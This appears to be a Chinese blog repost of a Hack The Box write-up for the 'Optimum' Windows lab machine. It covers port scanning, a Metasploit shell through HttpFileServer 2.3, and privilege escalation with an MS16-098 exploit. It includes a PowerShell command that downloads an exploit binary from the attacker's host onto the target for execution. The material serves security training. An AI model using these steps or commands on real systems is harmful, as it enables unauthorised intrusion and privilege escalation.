HTB靶场Optimum通关笔记,超推荐(window机器)

admin 2023年12月17日20:24:05评论52 views字数 916阅读3分3秒阅读模式

流程

结合步骤1.信息收集加确定目标。2.发现漏洞。3.漏洞利用getshell。4.提权 5.总结


1.信息收集

htbip给定 10.10.10.8,直接使用nmap扫一下端口开放情况  namp -sS -sV -F d-10.10.10.8

HTB靶场Optimum通关笔记,超推荐(window机器)

之开发80端口,直接进行访问

HTB靶场Optimum通关笔记,超推荐(window机器)


2.发现漏洞

发现到一个httpfileserver2.3 用到的中间件以及版本号,直接google上面寻找exp

HTB靶场Optimum通关笔记,超推荐(window机器)


3.漏洞利用以及getshell

也可以直接用msf进行拿下shell

HTB靶场Optimum通关笔记,超推荐(window机器)

看一下需要填入的参数  show options

HTB靶场Optimum通关笔记,超推荐(window机器)

成功拿到shell

HTB靶场Optimum通关笔记,超推荐(window机器)


4.提权

接下来开始提权,window常见提权方式:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、窃取令牌提权、bypassuac提权,第三方软件/服务提权,WEB中间件漏洞提权等。后续靶场会一个个涉及到,使用systeminfo或其他方式都可以看到补丁信息

HTB靶场Optimum通关笔记,超推荐(window机器)

保存为sys.txt    这里用到的工具为Windows-Exploit-Suggester,与刚才保存的系统情况sys.txt进行对比,提供可以用的exp 在本地重开一个终端

HTB靶场Optimum通关笔记,超推荐(window机器)

使用存在的数据库与刚才保存的sys.txt进行对比,显示可利用的exp

HTB靶场Optimum通关笔记,超推荐(window机器)

扫出来很多,那就用一下这个ms16-098 当github上面下载exp

然后在本地开启一个http服务,对方服务器进行下载

HTB靶场Optimum通关笔记,超推荐(window机器)

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.20:888/exp.exe', 'c:UsersPublicDownloadsexp2.exe')" 该条命令从我的kali里面下载exp到window服务器上

HTB靶场Optimum通关笔记,超推荐(window机器)

进入目录直接进行运行 成功提权

HTB靶场Optimum通关笔记,超推荐(window机器)


5.总结

本靶场较为简单,首先看到只开放80端口,进行访问80端口信息枚举,发现用到的中间件以及版本号,直接搜索exp拿到shell,发现服务器为window,寻找window提权方式,最直接的直接查看补丁情况,然后进行对比找到可以利用的exp,直接进行提权。

原文始发于微信公众号(菜菜sec):HTB靶场Optimum通关笔记,超推荐(window机器)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月17日20:24:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB靶场Optimum通关笔记,超推荐(window机器)https://cn-sec.com/archives/2310547.html

发表评论

匿名网友 填写信息